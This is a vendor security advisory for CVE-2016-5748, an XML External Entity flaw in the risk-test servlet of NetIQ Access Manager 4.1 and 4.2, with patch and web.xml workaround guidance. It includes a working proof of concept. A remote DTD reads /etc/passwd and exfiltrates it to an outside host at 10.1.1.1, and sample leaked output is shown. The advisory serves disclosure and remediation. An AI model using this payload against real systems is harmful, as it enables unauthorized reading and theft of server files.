Environment
NetIQ Access Manager 4.2
NetIQ Access Manager 4.1
Access Manager Identity Server
CVE-2016-5748
Situation
Access Manager 4.1 and 4.2 support risk-based authentication on the Identity Server. This feature ships with a risk servlet (/nidp/test/risk) that allows administrators and users to verify what their risk scores are. It is possible to modify the accompanying JSP page to trigger an XML External Entity (XXE) processing vulnerability (https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).
To do this, one needs access to modify /opt/novell/nids/lib/webapp/jsp/risk.jsp and change the default DTD file (loose.dtd) to point to another DTD file that does more damage, e.g. with a remotely accessible DTD you can execute an XXE attack that can in turn read the file system and any readable file on the IDP.
a) create sample DTD (test.dtd) on a web server for file access on the attacked system:
pentest@nam:~/neil$ cat test.dtd
<!ENTITY % p1 SYSTEM "file:///etc/passwd"> <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://10.1.1.1/bla#%p1;'>">%p2;
b) modify the risk.jsp to point to the test.dtd file created on the web server in a) above:
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://10.1.1.1/test.dtd" > <foo>&e1;</foo>
c) Access the risk servlet at https://login.netiq.com/nidp/test/risk, where login.netiq.com is the IDP server domain name, and confirm you see the contents of /etc/passwd in the browser:
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Client</faultcode><faultstring>http://10.1.1.1/bla#root:x:0:0:root:/root:/bin/bash
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
Resolution
Apply 4.2.2 for NAM 4.2; or 4.1.2 Hot Fix 1 for NAM 4.1.
As a workaround, one can also disable the risk.jsp in the web.xml file at /opt/novell/nids/lib/webapp/WEB-INF/web.xml. Simply delete the following lines and restart the IDP server with 'rcnovell-idp restart':
<!-- To disable the risk module test tool block below servlet and servlet-mapping tags -->
<servlet>
<servlet-name>riskjsp</servlet-name>
<display-name>test risk group</display-name>
<jsp-file>
/jsp/risk.jsp
</jsp-file>
</servlet>